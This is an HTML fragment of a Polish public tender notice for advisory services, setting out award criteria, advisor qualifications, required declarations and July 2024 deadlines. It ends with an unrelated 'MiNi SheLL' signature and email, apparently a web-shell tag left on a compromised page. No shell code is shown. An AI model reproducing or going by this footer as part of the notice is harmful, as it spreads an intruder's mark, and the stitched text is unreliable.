wezwany ten Wykonawca, którego oferta zostanie najwyżej oceniona). <br/>Wykonawca jest zobowiązany skierować do realizacji zamówienia osobę/y, która podlegała ocenie w kryterium oceny ofert.<br/>Wartość wagowa wyrażona w procentach jest równa wartości wyrażonej w punktach, tj.: 1%=1 pkt.<br/>8.	Oferty oceniane będą punktowo. Maksymalna liczba punktów, jaką po uwzględnieniu kryteriów może osiągnąć oferta wynosi 100 punktów. <br/>9.	Punkty zostaną przyznane wg wzoru S=C+D</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie doradcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>1)	zdolność do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>2)	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/> Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>3)	sytuacja ekonomiczna lub finansowa;<br/> Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/> Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>1.	dysponuje lub będzie dysponował w okresie realizacji przedmiotu umowy, co najmniej 1 ( jedną ) osobą, którą Wykonawca zamierza skierować do realizacji niniejszego zamówienia w funkcji doradcy, który posiada łącznie :<br/>Dla Części A:<br/>1.1. Wykształcenie:<br/>a) tytuł zawodowy magistra na kierunku lub w zakresie: prawo, praca socjalna, pedagogika, pedagogika specjalna, psychologia, nauki o rodzinie, polityka społeczna, politologia, politologia i nauki społeczne lub socjologia;<br/>oraz<br/>1.2.Doświadczenie, uzyskane w :<br/>a)	doświadczenie w przeprowadzeniu co najmniej 150 godzin zajęć dydaktycznych związanych z realizacją kształcenia lub szkolenia w zakresie zarządzania i realizacji usług społecznych, o których mowa w art. 2 ust. 1 ustawy z dnia 19 lipca 2019 r. o realizowaniu usług społecznych przez centrum usług społecznych;<br/>albo <br/>b)	co najmniej dwuletnie doświadczenie na stanowisku kierowniczym w centrach usług społecznych, lub instytucjach pomocy i integracji społecznej* lub jednostki samorządu terytorialnego, których przedmiotem była organizacja świadczenia usług społecznych w społeczności lokalnej; <br/>uzyskane w okresie ostatnich 5 lat przed dniem składania ofert<br/><br/>Dla Części B:<br/>1.1. Wykształcenie:<br/>a) tytuł zawodowy magistra na kierunku lub w zakresie: prawo, praca<br/>socjalna, pedagogika, pedagogika specjalna, psychologia, nauki o rodzinie,<br/>polityka społeczna, politologia, politologia i nauki społeczne lub socjologia;<br/>oraz<br/>1.2.Doświadczenie:<br/>a) doświadczenie w przeprowadzeniu co najmniej 150 godzin zajęć dydaktycznych związanych z realizacją kształcenia lub szkolenia, w tematyce wskazanej w punkcie 1 Załącznika nr 1B do SWZ – Opis Przedmiotu Zamówienia ( punkt 1 „Tematyka doradztwa” );<br/>albo <br/>b)co najmniej dwuletnie doświadczenie na stanowisku kierowniczym lub stanowisku koordynującym w centrach usług społecznych, lub w podmiocie realizującym organizację społeczności lokalnej, lub instytucjach pomocy i integracji społecznej* lub jednostki samorządu terytorialnego, których przedmiotem była organizacja świadczenia usług społecznych w społeczności lokalnej; <br/>uzyskane w okresie ostatnich 5 lat przed dniem składania ofert<br/><br/>*Przez instytucje pomocy i integracji społecznej rozumie się: jednostki organizacyjne pomocy społecznej określone w ustawie z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U.2017.1769 z późn. zm.), jednostki organizacyjne wspierania rodziny i systemu pieczy zastępczej określone w ustawie z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej (Dz.U.2017.697 z późn. zm.) oraz jednostki zatrudnienia socjalnego, organizacje pozarządowe, działające w sferze pomocy i integracji społecznej, zakłady aktywności zawodowej, podmioty wymienione w art. 3 ust. 3 pkt. 1 ustawy z dnia 24 kwietnia 2003 r. o pożytku publicznym i wolontariacie (Dz.U.2018.450), warsztaty terapii zajęciowej i inne podmioty prowadzące działalność w sferze pomocy i integracji społecznej, których głównym celem nie jest prowadzenie działalności gospodarczej.<br/>W każdej części może być wskazany ten sam doradca. <br/><br/>Wykonawca zobowiązany jest do skierowania do realizacji zamówienia osobę, którą wskaże w danej części do pełnienia funkcji doradcy, zgodnie ze wskazaniem części, do której zostały wpisane przez Wykonawcę. Wykonawca zobowiązany jest do podania wszystkich osób, które będą wykonywać zamówienie, pod rygorem niedopuszczenia ich do realizacji zamówienia.<br/><br/>Na potwierdzenie spełniania warunku udziału w postępowaniu Zamawiający będzie żądał od Wykonawcy, którego oferta zostanie najwyżej oceniona, podmiotowych środków dowodowych, określonych w Rozdziale VII ust. 2 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe składane w celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/> 1. Aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne potwierdzenie braku podstaw do wykluczenia oraz spełniania warunków udziału w postępowaniu, składane w odniesieniu do art. 125 ust. 1 ustawy Pzp – zgodnie z Załącznikiem nr 4 do SWZ składanym wraz z ofertą.<br/> 2. Dokumenty i oświadczenia w potwierdzające brak podstaw do wykluczenia Wykonawcy w zakresie art. 109 ustawy Pzp:<br/> a) Aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne potwierdzenie braku podstaw do wykluczenia , składane w odniesieniu do art. 125 ust. 1 ustawy Pzp – zgodnie z Załącznikiem do SWZ <br/>b) Odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/> zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Zastosowanie ma art. 274 ust. 4 ustawy Pzp<br/> c) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp<br/> (Załącznik nr 5 do SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/> art. 108 ust. 1 pkt 1-2 ustawy Pzp,<br/> art. 108 ust. 1 pkt 3 ustawy Pzp,<br/> art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/> zapobiegawczego,<br/> art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie<br/> konkurencji,<br/> art. 108 ust. 1 pkt 6 ustawy Pzp,<br/> art. 109 ust. 1 pkt 4, 8-10 ustawy Pzp,<br/> art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/> d) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w Roz. VII pkt. 2 ppkt. 1) lit. b) SWZ - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub<br/> miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego w funkcji doradcy, odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, stanowiące Załącznik nr 7 do SWZ<br/>Oferta Wykonawcy, który nie uzupełni wykazu osób skierowanych do realizacji przedmiotu zamówienia lub który wykaże w wykazie osób mniejszą liczbę godzin dydaktycznych szkoleń/warsztatów/wykładów lub lat doświadczenia przeprowadzonych przez osobę skierowaną do realizacji, Zamawiający odrzuci jako ofertę niespełniający warunków udziału w postępowaniu<br/>b) dokumentów dotyczących podmiotu trzeciego, w celu wykazania braku istnienia wobec niego podstaw wykluczenia oraz spełnienia, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu – jeżeli wykonawca polega na zasobach podmiotu trzeciego<br/>c) w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokumentów dotyczących każdego z wykonawców, w celu wykazania braku istnienia wobec niego podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca wraz z Ofertą zobowiązany jest złożyć: <br/>1) oświadczenie wstępne, przygotowane wg wzoru stanowiącego załącznik nr 4 do SWZ; <br/>2) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia jeśli Wykonawca korzysta z potencjału innego podmiotu, przygotowane wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>3) pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy jeżeli umocowanie nie wynika wprost z dokumentów rejestrowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIE – KONSORCJUM/SPÓŁKA CYWILNA<br/>1.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie, o którym mowa Rozdziale VII ust. 1 (Załącznik nr 4 do SWZ). Dokument ten potwierdza brak podstaw wykluczenia z postępowania w zakresie, w którym Wykonawca zobowiązany jest wykazać brak podstaw wykluczenia <br/>z postępowania oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2.	Wykonawcy tworzący konsorcjum, ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo do pełnienia takiej funkcji, wystawione zgodnie z wymogami ustawowymi, powinno być opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub osobistym przez prawnie upoważnionych przedstawicieli każdego z Wykonawców występujących wspólnie. <br/>3.	Wykonawcy, wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Warunki zmiany umowy zostały określone w PPU (Projektowane postanowienia umowy ) - Załączniku nr 3 do SWZ<br/> W pozostałym zakresie obowiązują przepisy ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-19 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/rops_lubuskie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-19 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com